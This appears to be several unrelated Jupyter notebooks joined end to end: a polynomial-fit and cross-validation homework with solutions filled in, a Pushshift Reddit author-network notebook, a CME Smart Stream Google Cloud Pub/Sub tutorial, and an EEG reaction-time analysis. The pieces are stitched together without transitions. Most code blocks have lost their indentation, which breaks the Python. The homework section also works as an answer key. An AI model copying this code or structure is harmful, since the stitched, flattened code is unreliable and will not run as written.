plt.show()
poly_plot(W, X, R)
```
## Polynomial order [1 pt]
You can now create a polynomial fit on the data for a polynomial of any order. The next question then becomes: *What order polynomial fits the data the best?*
Using the `create_D_matrix`, `poly_fit` and `poly_plot` functions, try to fit different order polynomials to the data. Show the plot for the polynomial order you think fits best.
Note that the cost function will most likely decrease with each added polynomial term, as there is more flexibility in the model to fit the data points exactly. However, these weights will fit those few data points very well, but might have very extreme values in between points that would not be good predictors for new inputs. Something like an order-20 polynomial might have a very well-fitting shape for the existing data points, but looks like it would be a strange predictor at some of the possible other points. Try to find a fit that looks visually like it would generalize well to new points.
```
# YOUR SOLUTION HERE
D = create_D_matrix(X, 4)
W = poly_fit(D, R)
poly_plot(W, X, R)
```
## Cross validation [2 pt]
Another way to answer this same question is to use cross validation. With cross validation you split the data into 2 parts and use one part to fit the model (training set) and the other part to see how well the model fits the remaining data (validation set). This way, we can select a model that is less prone to overfitting.
Write a function below to split the original dataset into 2 sets according to a given ratio. It is important to randomize your division, as simply using the first half of data for the one set and the second half for the other, might result in a strange distribution. You could use a function like [shuffle](https://docs.scipy.org/doc/numpy/reference/generated/numpy.random.shuffle.html) for this purpose.
Split the original dataset using a ratio of 0.6 into a training and a validation set. Then for both of these sets, use your old `split_X_R` function to split them into their $X$ and $R$ parts.
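One subtlety: `np.random.shuffle` reorders `data` in place, so the original row order is lost after the split. If that matters, a non-destructive variant can index with a random permutation instead (a sketch; `validation_split_copy` and its `seed` argument are our own additions, not part of the assignment):

```python
import numpy as np

def validation_split_copy(data, ratio, seed=None):
    """Split rows into (training, validation) sets without mutating data."""
    rng = np.random.default_rng(seed)
    idx = rng.permutation(len(data))  # random row order; data itself is untouched
    n = int(ratio * len(data))
    return data[idx[:n]], data[idx[n:]]

data = np.arange(20).reshape(10, 2)
train, val = validation_split_copy(data, 0.6, seed=0)
```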
```
def validation_split(data, ratio):
# YOUR SOLUTION HERE
np.random.shuffle(data)
n = int(ratio*len(data))
training_set = data[:n, :]
validation_set = data[n:, :]
return training_set, validation_set
# YOUR SOLUTION HERE
training_set, validation_set = validation_split(data, 0.6)
train_x, train_r = split_X_R(training_set)
val_x, val_r = split_X_R(validation_set)
```
## Model selection [5 pt]
With this new split of the data you can just repeatedly fit different order polynomials to the training set and see which produces the lowest cost on the validation set. The set of weights with the lowest cost on the validation set generalizes the best to new data and is thus the best overall fit on the dataset.
Write the function `best_poly_fit` below. Try a large range of polynomial orders (like 1 to 50), create the $D$ matrix based on the training set for each order and fit the weights for that polynomial. Then for each of these found weights, also create the D matrix for the validation set and compute the cost using `poly_cost`. Return the set of weights with the lowest cost on the validation set and the corresponding cost.
Run this fitting function with your training and validation sets. Plot the hypothesis function and show the weights that were found and what the cost was. Note that rerunning your validation split code above will result in a different random distribution and thus a slightly different final fit.
```
def best_poly_fit(train_x, train_r, val_x, val_r):
# YOUR SOLUTION HERE
lowest_cost = float('inf')
best_w = 0
for k in range(1,51):
train_D = create_D_matrix(train_x, k)
W = poly_fit(train_D, train_r)
val_D = create_D_matrix(val_x, k)
cost = poly_cost(W, val_D, val_r)
if cost < lowest_cost:
lowest_cost = cost
best_w = W
return best_w, lowest_cost
# YOUR SOLUTION HERE
best_w, lowest_cost = best_poly_fit(train_x, train_r, val_x, val_r)
poly_plot(best_w, X, R)
print('The weights are:\n' +str(best_w)+'\nThe cost is:\n'+str(lowest_cost))
```
# Exploring Reddit with the pushshift API
This notebook gives you examples of how to use the Pushshift API for querying Reddit data.
* Pushshift doc: https://github.com/pushshift/api
* FAQ about Pushshift: https://www.reddit.com/r/pushshift/comments/bcxguf/new_to_pushshift_read_this_faq/
```
import requests
import pandas as pd
```
We define a convenient function to get data from Pushshift:
```
def get_pushshift_data(data_type, params):
"""
Gets data from the pushshift api.
data_type can be 'comment' or 'submission'
The rest of the args are interpreted as payload.
Read more: https://github.com/pushshift/api
    This function is inspired by:
https://www.jcchouinard.com/how-to-use-reddit-api-with-python/
"""
base_url = f"https://api.pushshift.io/reddit/search/{data_type}/"
request = requests.get(base_url, params=params)
print('Query:')
print(request.url)
    try:
        data = request.json().get("data")
    except ValueError:  # response body was not valid JSON
        print('--- Request failed ---')
        data = []
    return data
```
This function accepts the parameters of the pushshift API detailed in the doc at https://github.com/pushshift/api. An example is given below.
## Example of request to the API
Let us collect the comments written in the last 2 days in the subreddit `askscience`. The number of results returned is limited to 100, the upper limit of the API.
```
# parameters for the pushshift API
data_type = "comment" # accept "comment" or "submission", search in comments or submissions
params = {
"subreddit" : "askscience", # limit to one or a list of subreddit(s)
"after" : "2d", # Select the timeframe. Epoch value or Integer + "s,m,h,d" (i.e. "second", "minute", "hour", "day")
"size" : 100, # Number of results to return (limited to max 100 in the API)
"author" : "![deleted]" # limit to a list of authors or ignore authors with a "!" mark in front
}
# Note: the option "aggs" (aggregate) has been de-activated in the API
data = get_pushshift_data(data_type, params)
df = pd.DataFrame.from_records(data)
print('Some of the data returned:')
df[['author', 'subreddit', 'score', 'created_utc', 'body']].head()
```
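The `created_utc` column returned by Pushshift holds Unix epoch timestamps (seconds). To make them human-readable you can convert the column with pandas; a small sketch, independent of the API call above:

```python
import pandas as pd

# created_utc values as returned by Pushshift (seconds since the Unix epoch)
df_demo = pd.DataFrame({"created_utc": [1609459200, 1609545600]})
df_demo["created"] = pd.to_datetime(df_demo["created_utc"], unit="s")
print(df_demo)
#    created_utc             created
# 0   1609459200 2021-01-01 00:00:00
# 1   1609545600 2021-01-02 00:00:00
```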
## Authors of comments
Let us collect the authors of comments in a subreddit during the last few days. The next function helps bypass the limit on the number of results by sending the query multiple times, while avoiding collecting duplicate authors.
```
# Get the list of unique authors of comments in the API results
# bypass the limit of 100 results by sending multiple queries
def get_unique_authors(n_results, params):
results_per_request = 100 # default nb of results per query
n_queries = n_results // results_per_request + 1
author_list = []
author_neg_list = ["![deleted]"]
for query in range(n_queries):
params["author"] = author_neg_list
data = get_pushshift_data(data_type="comment", params=params)
df = pd.DataFrame.from_records(data)
if df.empty:
return author_list
authors = list(df['author'].unique())
# add ! mark
authors_neg = ["!"+ a for a in authors]
author_list += authors
author_neg_list += authors_neg
return author_list
# Ask for the authors of comments in the last days, collect at least "n_results"
subreddit = "askscience"
data_type = "comment"
params = {
"subreddit" : subreddit,
"after" : "2d"
}
n_results = 500
author_list = get_unique_authors(n_results, params)
print("Number of authors:",len(author_list))
# Collect the subreddits where the authors wrote comments and the number of comments
from collections import Counter
data_type = "comment"
params = {
"size" : 100
}
subreddits_count = Counter()
for author in author_list:
params["author"] = author
print(params["author"])
data = get_pushshift_data(data_type=data_type, params=params)
    if data: # in case the request failed and data is empty
df = pd.DataFrame.from_records(data)
subreddits_count += Counter(dict(df['subreddit'].value_counts()))
```
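The loop above accumulates per-author counts with `subreddits_count += Counter(...)`. Adding two `Counter` objects sums the counts key by key, which is exactly what we need here; a quick illustration:

```python
from collections import Counter

total = Counter({"askscience": 3, "python": 1})
author_counts = Counter({"askscience": 2, "news": 4})

total += author_counts
print(total)  # Counter({'askscience': 5, 'news': 4, 'python': 1})
```

One caveat: `Counter` addition drops keys whose summed count is not positive, which is harmless here since comment counts are always positive.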
## Network of subreddits (ego-graph)
Let us build the ego-graph of the subreddit. Other subreddits are connected to the main one when the users we collected commented in those subreddits as well.
```
# module for networks
import networkx as nx
threshold = 0.05
G = nx.Graph()
G.add_node(subreddit)
self_refs = subreddits_count[subreddit]
for sub,value in subreddits_count.items():
post_ratio = value/self_refs
if post_ratio >= threshold:
G.add_edge(subreddit,sub, weight=post_ratio)
print("Total number of edges in the graph:",G.number_of_edges())
```
Here is an alternative way of generating the graph using pandas dataframes instead of a for loop (it might scale better on bigger graphs).
```
threshold = 0.05
subreddits_count_df = pd.DataFrame.from_dict(subreddits_count, orient='index', columns=['total'])
subreddits_ratio_df = subreddits_count_df/subreddits_count_df.loc[subreddit]
subreddits_ratio_df.rename(columns={'total': 'weight'}, inplace=True)
filtered_sr_df = subreddits_ratio_df[subreddits_ratio_df['weight'] >= threshold].copy() # filter weights < threshold
filtered_sr_df['source'] = subreddit
filtered_sr_df['target'] = filtered_sr_df.index
Gdf = nx.from_pandas_edgelist(filtered_sr_df, source='source', target='target', edge_attr=True)
print("Total number of edges in the graph:",Gdf.number_of_edges())
# Write the graph to a file
path = 'egograph.gexf'
nx.write_gexf(G,path)
```
## Network of subreddit neighbors
This second collection makes a distinction between the related subreddits. For each author, all the subreddits where they commented will be connected together. The weight of each connection is proportional to the number of users commenting in both subreddits joined by that connection. The ego-graph becomes an approximate neighbor network for the central subreddit.
```
data_type = "comment"
params = {
"size" : 100
}
count_list = []
for author in author_list:
params["author"] = author
print(params["author"])
data = get_pushshift_data(data_type=data_type, params=params)
if data:
df = pd.DataFrame.from_records(data)
count_list.append(Counter(dict(df['subreddit'].value_counts())))
import itertools
threshold = 0.05
G = nx.Graph()
for author_sub_count in count_list:
sub_list = author_sub_count.most_common(10)
# Compute all the combinations of subreddit pairs
sub_combinations = list(itertools.combinations(sub_list, 2))
for sub_pair in sub_combinations:
node1 = sub_pair[0][0]
node2 = sub_pair[1][0]
if G.has_edge(node1, node2):
G[node1][node2]['weight'] +=1
else:
G.add_edge(node1, node2, weight=1)
print("Total number of edges {}, and nodes {}".format(G.number_of_edges(),G.number_of_nodes()))
# Sparsify the graph
to_remove = [edge for edge in G.edges.data() if edge[2]['weight'] < 2]
G.remove_edges_from(to_remove)
# Remove isolated nodes
G.remove_nodes_from(list(nx.isolates(G)))
print("Total number of edges {}, and nodes {}".format(G.number_of_edges(),G.number_of_nodes()))
# Write the graph to a file
path = 'graph.gexf'
nx.write_gexf(G,path)
```
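The co-occurrence step above relies on `itertools.combinations` to pair up every subreddit an author commented in. A quick illustration of what it produces for a small list of `(subreddit, count)` tuples, mirroring the `most_common` output used above:

```python
import itertools

sub_list = [("askscience", 5), ("python", 3), ("news", 1)]
pairs = list(itertools.combinations(sub_list, 2))
for (sub_a, _), (sub_b, _) in pairs:
    print(sub_a, "<->", sub_b)
# askscience <-> python
# askscience <-> news
# python <-> news
```

Each unordered pair appears exactly once, so every pass over an author's subreddit list increments each edge weight at most once.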
An example of the graph visualization you can obtain using Gephi:

# CME Smart Stream on Google Cloud Platform Tutorials
## Getting CME Binary Data from CME Smart Stream on Google Cloud Platform (GCP)
This workbook demonstrates how to quickly use the CME Smart Stream on GCP solution. Through the examples, we will
- Authenticate using GCP IAM information
- Configure which CME Smart Stream on GCP Topic containing the Market Data
- Download a single message from your Cloud Pub/Sub Subscription
- Delete your Cloud Pub/Sub Subscription
The following example references the following webpage to pull the information:
https://www.cmegroup.com/confluence/display/EPICSANDBOX/CME+Smart+Stream+GCP+Topic+Names
Author: Aaron Walters (Github: @aaronwalters79).
OS: MacOS
```
#import packages. These are outlined in the environment.yaml file as part of this project.
#these can also be directly imported.
# Google SDK: https://cloud.google.com/sdk/docs/quickstarts
# Google PubSub: https://cloud.google.com/pubsub/docs/reference/libraries
from google.cloud import pubsub_v1
import os
import sys  # used below when reporting subscription-creation errors
import google.auth
```
# Authentication using Google IAM
CME Smart Stream uses Google Cloud's native Identity and Access Management (IAM). Using this approach, customers can natively access the CME Smart Stream solution without custom SDKs or authentication routines. All the code in this workbook is native Google Python SDK. While the Google Pub/Sub examples below use Python, native SDKs exist for other popular languages, including Java, C#, Node.js, PHP, and others.
To download those libraries, please see the following location: https://cloud.google.com/pubsub/docs/reference/libraries
When onboarding to CME Smart Stream, you will supply at least one Google IAM member account: https://cloud.google.com/iam/docs/overview. When accessing CME Smart Stream Topics, you will use the same IAM account information to create your Subscription using the native GCP authentication routines within the GCP SDK.
The authentication routines below use either a Service Account or a User Account. Google highly recommends using a Service Account with its associated authorization JSON. This document also covers authentication via User Account, in case you asked CME to register a User Account for access. You only need to use one of these for the example.
## Authentication Routine for Service Account
This section is for customers using Service Accounts. You should update the './gcp-auth.json' to reference your local authorization json file downloaded from google.
Further documentation is located here: https://cloud.google.com/docs/authentication/getting-started
```
## Authentication Method Options -- SERVICE ACCOUNT JSON FILE
# This should point to the file location of the JSON file downloaded from the GCP console. This loads it into your OS environment variables, and it will be automatically used when your system interacts with GCP.
#os.environ['GOOGLE_APPLICATION_CREDENTIALS'] = "./gcp-auth.json" #Uncomment if using this method.
```
## Authentication for User Account
This section is for customers that registered their GCP User Account (i.e. user@domain.com). This routine will launch the gcloud SDK to authenticate you as that user and then set those credentials as the default for the rest of the workflow when interacting with GCP.
IN OS TERMINAL: 'gcloud auth application-default login' without quotes.
```
## Authentication Method User Machine Defaults
#
#Run "gcloud auth application-default login" in the command line and log in as the user.
#It should launch a browser to authenticate into GCP; that user name and its associated permissions will be used in the remainder of the code below.
# This code will put out a warning about using end user credentials.
# Reference: https://google-auth.readthedocs.io/en/latest/user-guide.html
credentials, project = google.auth.default()
```
# Set Your Smart Stream on GCP Projects and Topics
## Set CME Smart Stream Project
CME Smart Stream on GCP data is available in two GCP Projects, based upon Production and Non-Production (i.e. certification and new release) data. Customers are granted access to the projects through the onboarding process.
The example below sets the target CME Smart Stream on GCP Project as an OS variable for easy reference.
```
#This is the project at CME
os.environ['GOOGLE_CLOUD_PROJECT_CME'] = "cmegroup-marketdata-newrel" #CERT and NEW RELEASE
#os.environ['GOOGLE_CLOUD_PROJECT_CME'] = "cmegroup-marketdata" #PRODUCTION
```
## Set CME Smart Stream Topics
CME Smart Stream on GCP follows the traditional data segmentation of the CME Multicast solution.
Each channel on Multicast is available as a Topic in Google Cloud Pub/Sub. This workbook will create one subscription in the customer's account against one Topic from the CME project. Customers can of course script this to create as many subscriptions as needed.
Please see: https://www.cmegroup.com/confluence/display/EPICSANDBOX/CME+Smart+Stream+GCP+Topic+Names for all the topic names.
You can also review the notebook included in this git project named Google PubSub Get CME Topics on how to read the names from the website into a local CSV file or use in automated scripts.
```
# The CME TOPIC that a Subscription will be created against
os.environ['GOOGLE_CLOUD_TOPIC_CME'] = "CERT.SSCL.GCP.MD.RT.CMEG.FIXBIN.v01000.INCR.310" #CERT
#os.environ['GOOGLE_CLOUD_TOPIC_CME'] = "NR.SSCL.GCP.MD.RT.CMEG.FIXBIN.v01000.INCR.310" #NEW RELEASE
#os.environ['GOOGLE_CLOUD_TOPIC_CME'] = "CERT.SSCL.GCP.MD.RT.CMEG.FIXBIN.v01000.INCR.310" #PRODUCTION
```
# Set Customer Configurations
## Set Customer Project & Subscription Name
The Smart Stream on GCP solution requires that the customer create a Cloud Pub/Sub Subscription in their own account. This subscription will automatically collect data from the CME Smart Stream Pub/Sub Topic. Since the Subscription lives in the customer account, we must specify the customer GCP Project and the name of the Subscription they want in that project.
In the example below, we set the project directly based upon our GCP project name. We also create a subscription name by prepending 'MY_' to the name of the Topic we are joining.
```
#Your Configurations for the project you want to have access;
#will use the defaults from credentials
os.environ['GOOGLE_CLOUD_PROJECT'] = "prefab-rampart-794"
#My Subscription Name -- Take the CME Topic Name and prepend 'MY_' -- Can be anything the customer wants
os.environ['MY_SUBSCRIPTION_NAME'] = 'MY_'+os.environ['GOOGLE_CLOUD_TOPIC_CME'] #MY SUBSCRIPTION NAME
```
# Final Configuration
The following is the final configuration for your setup.
```
print ('Target Project: \t',os.environ['GOOGLE_CLOUD_PROJECT_CME'] )
print ('Target Topic: \t\t', os.environ['GOOGLE_CLOUD_TOPIC_CME'] , '\n' )
print ('My Project: \t\t',os.environ['GOOGLE_CLOUD_PROJECT'])
print ('My Subscriptions: \t',os.environ['MY_SUBSCRIPTION_NAME'] )
```
# Create Your Subscription to CME Smart Stream Data Topics
We have all the main variables set and can pass them to the Cloud Pub/Sub Python SDK. The following attempts to create a Subscription (MY_SUBSCRIPTION_NAME) in your specified project (GOOGLE_CLOUD_PROJECT) that points to the CME Topic (GOOGLE_CLOUD_TOPIC_CME) and Project (GOOGLE_CLOUD_PROJECT_CME) of that Topic.
Once the Subscription is created (or found to already exist), we join our Python session to it as 'subscriber'.
Full documentation on this Pub/Sub example is available at https://googleapis.github.io/google-cloud-python/latest/pubsub/#subscribing
```
#https://googleapis.github.io/google-cloud-python/latest/pubsub/#subscribing
#Create Topic Name from Config Above
topic_name = 'projects/{cme_project_id}/topics/{cme_topic}'.format( cme_project_id=os.getenv('GOOGLE_CLOUD_PROJECT_CME'), cme_topic=os.getenv('GOOGLE_CLOUD_TOPIC_CME'), )
#Create Subscription Name from Config Above
subscription_name = 'projects/{my_project_id}/subscriptions/{my_sub}'.format(my_project_id=os.getenv('GOOGLE_CLOUD_PROJECT'),my_sub=os.environ['MY_SUBSCRIPTION_NAME'], )
#Try To Create a subscription in your Project
subscriber = pubsub_v1.SubscriberClient(credentials=credentials)
try:
subscriber.create_subscription(
name=subscription_name,
topic=topic_name,
        ack_deadline_seconds=60, #This limits the likelihood Google will redeliver a received message; the default is 10s.
)
print ('Created Subscriptions in Project \n')
print ('Listing Subscriptions in Your Project %s : ' % os.getenv('GOOGLE_CLOUD_PROJECT'))
for subscription in subscriber.list_subscriptions(subscriber.project_path(os.environ['GOOGLE_CLOUD_PROJECT'])):
print('\t', subscription.name)
except Exception:
e = sys.exc_info()[1]
print( "Error: %s \n" % e )
```
## Subscription View in Google Cloud Console
Subscriptions are also available for viewing in the Google Cloud Console (https://console.cloud.google.com/). Navigate to Cloud Pub/Sub and click Subscriptions. If you click your Subscription name, it will open the details for that Subscription. You can see all queued messages and the core settings, which are at their defaults since we did not specify special settings in the functions above.
Another thing shown in this view is the total queued messages from GCP in the Subscription.
## Pull a Single Message from CME
The following will do a simple message pull from your Subscription and print it out locally. There are extensive examples on data pulling from a Subscription including batch and async (https://cloud.google.com/pubsub/docs/pull).
```
#Pull 1 Message
print ('Pulling a Single Message and Displaying:')
CME_DATA = subscriber.pull(subscription_name, max_messages=1)
#Print that Message
print (CME_DATA)
```
# Delete Subscriptions
You can also use the Python SDK to delete your Cloud Pub/Sub Subscriptions. The following will attempt to delete ALL the subscriptions in your Project.
```
#List Subscriptions in My Project / Delete Subscription
delete = True
subscriber = pubsub_v1.SubscriberClient()
project_path = subscriber.project_path(os.environ['GOOGLE_CLOUD_PROJECT'])
if not delete:
print ('Did you mean to Delete all Subscriptions? If yes, then set delete = True')
for subscription in subscriber.list_subscriptions(project_path):
#Delete Subscriptions
if delete:
subscriber.delete_subscription(subscription.name)
print ("\tDeleted: {}".format(subscription.name))
else:
print("\tActive Subscription: {}".format(subscription.name))
```
# Summary
This notebook went through the bare minimum needed to create a Cloud Pub/Sub Subscription against the CME Smart Stream on GCP solutions.
# Questions?
If you have questions or think we can update this for additional use cases, please use the Issues feature in GitHub or reach out to the CME Sales team at markettechsales@cmegroup.com.
```
from __future__ import division
%matplotlib inline
import sys
import os
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import seaborn as sns
import scipy.io as io
import pickle
import scipy.stats
SBJ = 'colin_test2'
prj_dir = '/Volumes/hoycw_clust/PRJ_Error_eeg/'#'/Users/sheilasteiner/Desktop/Knight_Lab/PRJ_Error_eeg/'
results_dir = prj_dir+'results/'
fig_type = '.png'
data_dir = prj_dir+'data/'
sbj_dir = data_dir+SBJ+'/'
```
### Load paradigm parameters
```
prdm_fname = os.path.join(sbj_dir,'03_events',SBJ+'_prdm_vars.pkl')
with open(prdm_fname, 'rb') as f:
prdm = pickle.load(f)
```
### Load Log Info
```
behav_fname = os.path.join(sbj_dir,'03_events',SBJ+'_behav.csv')
data = pd.read_csv(behav_fname)
# Remove second set of training trials in restarted runs (EEG12, EEG24, EEG25)
if len(data[(data['Trial']==0) & (data['Block']==-1)])>1:
train_start_ix = data[(data['Trial']==0) & (data['Block']==-1)].index
train_ix = [ix for ix in data.index if data.loc[ix,'Block']==-1]
later_ix = [ix for ix in data.index if ix >= train_start_ix[1]]
data = data.drop(set(later_ix).intersection(train_ix))
data = data.reset_index()
# Change block numbers on EEG12 to not overlap
if SBJ=='EEG12':
b4_start_ix = data[(data['Trial']==0) & (data['Block']==4)].index
for ix in range(b4_start_ix[1]):
if data.loc[ix,'Block']!=-1:
data.loc[ix,'Block'] = data.loc[ix,'Block']-4
# Label post-correct (PC), post-error (PE) trials
data['PE'] = [False for _ in range(len(data))]
for ix in range(len(data)):
# Exclude training data and first trial of the block
if (data.loc[ix,'Block']!=-1) and (data.loc[ix,'Trial']!=0):
if data.loc[ix-1,'Hit']==0:
data.loc[ix,'PE'] = True
# pd.set_option('max_rows', 75)
# data[data['Block']==3]
```
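The post-error labeling loop above can also be written in vectorized pandas using `shift`, which looks at the previous row without an explicit loop. A sketch on a toy frame (the column names match those used above, and the conditions mirror the loop: exclude training blocks and the first trial of each block):

```python
import pandas as pd

toy = pd.DataFrame({
    "Block": [-1, 1, 1, 1, 1],
    "Trial": [0, 0, 1, 2, 3],
    "Hit":   [0, 1, 0, 0, 1],
})
# Post-error: previous trial was a miss, excluding training and block-initial trials
toy["PE"] = (toy["Hit"].shift(1) == 0) & (toy["Block"] != -1) & (toy["Trial"] != 0)
print(toy["PE"].tolist())  # [False, False, False, True, True]
```

`shift(1)` fills the first row with NaN, and `NaN == 0` is False, so the first trial is never marked post-error.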
# Add specific analysis computations
```
# Find middle of blocks to plot accuracy
block_start_ix = data[data['Trial']==0].index
if SBJ=='EP11':#deal with missing BT_T0
block_mid_ix = [ix+prdm['n_trials']/2 for ix in block_start_ix]
else:
block_mid_ix = [ix+prdm['n_trials']/2 for ix in block_start_ix[1:]]
# Add in full_vis + E/H training: 0:4 + 5:19 = 10; 20:34 = 27.5
block_mid_ix.insert(0,np.mean([prdm['n_examples']+prdm['n_training'],
prdm['n_examples']+2*prdm['n_training']])) #examples
block_mid_ix.insert(0,np.mean([0, prdm['n_examples']+prdm['n_training']]))
#easy training (would be 12.5 if splitting examples/train)
# Compute accuracy per block
accuracy = data['Hit'].groupby([data['Block'],data['Condition']]).mean()
acc_ITI = data['Hit'].groupby([data['ITI type'],data['Condition']]).mean()
for ix in range(len(data)):
data.loc[ix,'Accuracy'] = accuracy[data.loc[ix,'Block'],data.loc[ix,'Condition']]
data.loc[ix,'Acc_ITI'] = acc_ITI[data.loc[ix,'ITI type'],data.loc[ix,'Condition']]
# Break down by post-long and post-short trials
data['postlong'] = [False if ix==0 else True if data['RT'].iloc[ix-1]>1 else False for ix in range(len(data))]
# Compute change in RT
data['dRT'] = [0 for ix in range(len(data))]
for ix in range(len(data)-1):
data.loc[ix+1,'dRT'] = data.loc[ix+1,'RT']-data.loc[ix,'RT']
# Grab rating data to plot
rating_trial_idx = [True if rating != -1 else False for rating in data['Rating']]
rating_data = data['Rating'][rating_trial_idx]
```
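The change-in-RT loop above is equivalent to pandas' built-in `diff`, which subtracts the previous row's value from each row. A small sketch on toy RTs (filling the first trial with 0, as the loop does implicitly):

```python
import pandas as pd

rt = pd.Series([1.00, 1.10, 0.95, 1.05])
drt = rt.diff().fillna(0)  # first trial has no previous RT -> 0, as in the loop
print([round(x, 2) for x in drt.tolist()])  # [0.0, 0.1, -0.15, 0.1]
```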
# Plot Full Behavior Across Dataset
```
# Accuracy, Ratings, and Tolerance
f, ax1 = plt.subplots()
x = range(len(data))
plot_title = '{0} Tolerance and Accuracy: easy={1:0.3f}; hard={2:0.3f}'.format(
SBJ, data[data['Condition']=='easy']['Hit'].mean(),
data[data['Condition']=='hard']['Hit'].mean())
colors = {'easy': [0.5, 0.5, 0.5],#[c/255 for c in [77,175,74]],
'hard': [1, 1, 1],#[c/255 for c in [228,26,28]],
'accuracy': 'k'}#[c/255 for c in [55,126,184]]}
scat_colors = {'easy': [1,1,1],#[c/255 for c in [77,175,74]],
'hard': [0,0,0]}
accuracy_colors = [scat_colors[accuracy.index[ix][1]] for ix in range(len(accuracy))]
#scale = {'Hit Total': np.max(data['Tolerance'])/np.max(data['Hit Total']),
# 'Score Total': np.max(data['Tolerance'])/np.max(data['Score Total'])}
# Plot Tolerance Over Time
ax1.plot(data['Tolerance'],'b',label='Tolerance')
ax1.plot(x,[prdm['tol_lim'][0] for _ in x],'b--')
ax1.plot(x,[prdm['tol_lim'][1] for _ in x],'b--')
ax1.set_ylabel('Target Tolerance (s)', color='b')
ax1.tick_params('y', colors='b')
ax1.set_xlim([0,len(data)])
ax1.set_ylim([0, 0.41])
ax1.set_facecolor('white')
ax1.grid(False)
# Plot Accuracy per Block
ax2 = ax1.twinx()
# ax2.plot(data['Hit Total']/np.max(data['Hit Total']),'k',label='Hit Total')
ax2.fill_between(x, 1, 0, where=data['Condition']=='easy',
facecolor=colors['easy'], alpha=0.3)#, label='hard')
ax2.fill_between(x, 1, 0, where=data['Condition']=='hard',
facecolor=colors['hard'], alpha=0.3)#, label='easy')
ax2.scatter(block_mid_ix, accuracy, s=50, c=accuracy_colors,
edgecolors='k', linewidths=1)#colors['accuracy'])#,linewidths=2)
ax2.scatter(rating_data.index.values, rating_data.values/100, s=25, c=[1, 0, 0])
ax2.set_ylabel('Accuracy', color=colors['accuracy'])
ax2.tick_params('y', colors=colors['accuracy'])
ax2.set_xlabel('Trials')
ax2.set_xlim([0,len(data)])
ax2.set_ylim([0, 1])
ax2.set_facecolor('white')
ax2.grid(False)
plt.title(plot_title)
plt.savefig(results_dir+'BHV/ratings_tolerance/'+SBJ+'_tolerance'+fig_type)
```
# Plot only real data (exclude examples + training)
```
data_all = data
# Exclude: Training/Examples, non-responses, first trial of each block
if data[data['RT']<0].shape[0]>0:
    print('WARNING: '+str(data[data['RT']<0].shape[0])+' trials with no response!')
data = data[(data['Block']!=-1) & (data['RT']>0) & (data['ITI']>0)]
```
## Histogram of ITIs
```
# ITI Histogram
f,axes = plt.subplots(1,2)
bins = np.arange(0,1.1,0.01)
hist_real = sns.distplot(data['ITI'],bins=bins,kde=False,label=SBJ,ax=axes[0])
hist_adj = sns.distplot(data['ITI type'],bins=bins,kde=False,label=SBJ,ax=axes[1])
axes[0].set_xlim([0, 1.1])
axes[1].set_xlim([0, 1.1])
plt.subplots_adjust(top=0.93)
f.suptitle(SBJ)
plt.savefig(results_dir+'BHV/ITIs/'+SBJ+'_ITI_hist'+fig_type)
```
## Histogram of all RTs
```
# RT Histogram
f,ax = plt.subplots()
hist = sns.distplot(data['RT'],label=SBJ)
plt.subplots_adjust(top=0.9)
hist.legend() # can also get the figure from plt.gcf()
plt.savefig(results_dir+'BHV/RTs/histograms/'+SBJ+'_RT_hist'+fig_type)
```
## RT Histograms by ITI
```
# ANOVA for RT differences across ITI
itis = np.unique(data['ITI type'])
if len(prdm['ITIs'])==4:
f,iti_p = scipy.stats.f_oneway(data.loc[data['ITI type']==itis[0],('RT')].values,
data.loc[data['ITI type']==itis[1],('RT')].values,
data.loc[data['ITI type']==itis[2],('RT')].values,
data.loc[data['ITI type']==itis[3],('RT')].values)
elif len(prdm['ITIs'])==3:
f,iti_p = scipy.stats.f_oneway(data.loc[data['ITI type']==itis[0],('RT')].values,
data.loc[data['ITI type']==itis[1],('RT')].values,
data.loc[data['ITI type']==itis[2],('RT')].values)
elif len(prdm['ITIs'])==2:
f,iti_p = scipy.stats.ttest_ind(data.loc[data['ITI type']==itis[0],('RT')].values,
data.loc[data['ITI type']==itis[1],('RT')].values)
else:
    print('WARNING: some weird paradigm version without 2, 3, or 4 ITIs!')
# print f, p
f, axes = plt.subplots(1,2)
# RT Histogram
rt_bins = np.arange(0.7,1.3,0.01)
for iti in itis:
sns.distplot(data['RT'].loc[data['ITI type'] == iti],bins=rt_bins,label=str(round(iti,2)),ax=axes[0])
axes[0].legend() # can also get the figure from plt.gcf()
axes[0].set_xlim(min(rt_bins),max(rt_bins))
# Factor Plot
sns.boxplot(data=data,x='ITI type',y='RT',hue='ITI type',ax=axes[1])
# Add overall title
plt.subplots_adjust(top=0.9,wspace=0.3)
f.suptitle(SBJ+' RT by ITI (p='+str(round(iti_p,4))+')') # can also get the figure from plt.gcf()
# Save plot
plt.savefig(results_dir+'BHV/RTs/hist_ITI/'+SBJ+'_RT_ITI_hist_box'+fig_type)
```
## RT adjustment after being short vs. long
```
# t test for RT differences across ITI
itis = np.unique(data['ITI type'])
f,postlong_p = scipy.stats.ttest_ind(data.loc[data['postlong']==True,('dRT')].values,
data.loc[data['postlong']==False,('dRT')].values)
f, axes = plt.subplots(1,2)
# RT Histogram
drt_bins = np.arange(-0.6,0.6,0.025)
sns.distplot(data['dRT'].loc[data['postlong']==True],bins=drt_bins,label='Post-Long',ax=axes[0])
sns.distplot(data['dRT'].loc[data['postlong']==False],bins=drt_bins,label='Post-Short',ax=axes[0])
axes[0].legend() # can also get the figure from plt.gcf()
axes[0].set_xlim(min(drt_bins),max(drt_bins))
# Factor Plot
sns.boxplot(data=data,x='postlong',y='dRT',hue='postlong',ax=axes[1])
# Add overall title
plt.subplots_adjust(top=0.9,wspace=0.3)
f.suptitle(SBJ+' RT by ITI (p='+str(round(postlong_p,6))+')') # can also get the figure from plt.gcf()
# Save plot
plt.savefig(results_dir+'BHV/RTs/hist_dRT/'+SBJ+'_dRT_postlong_hist_box'+fig_type)
```
## RT and Accuracy Effects by ITI and across post-error trials
```
# RTs by condition
# if len(prdm_params['ITIs'])==4: # target_time v1.8.5+
# data['ITI type'] = ['short' if data['ITI'][ix]<0.5 else 'long' for ix in range(len(data))]
# ITI_plot_order = ['short','long']
# elif len(prdm_params['ITIs'])==3: # target_time v1.8.4 and below
# data['ITI type'] = ['short' if data['ITI'][ix]<prdm_params['ITI_bounds'][0] else 'long' \
# if data['ITI'][ix]>prdm_params['ITI_bounds'][1] else 'medium'\
# for ix in range(len(data))]
# ITI_plot_order = ['short','medium','long']
# else: # Errors for anything besides len(ITIs)==3,4
# assert len(prdm_params['ITIs'])==4
plot = sns.factorplot(data=data,x='ITI type',y='dRT',hue='PE',col='Condition',kind='point',
ci=95);#,order=ITI_plot_order
plt.subplots_adjust(top=0.9)
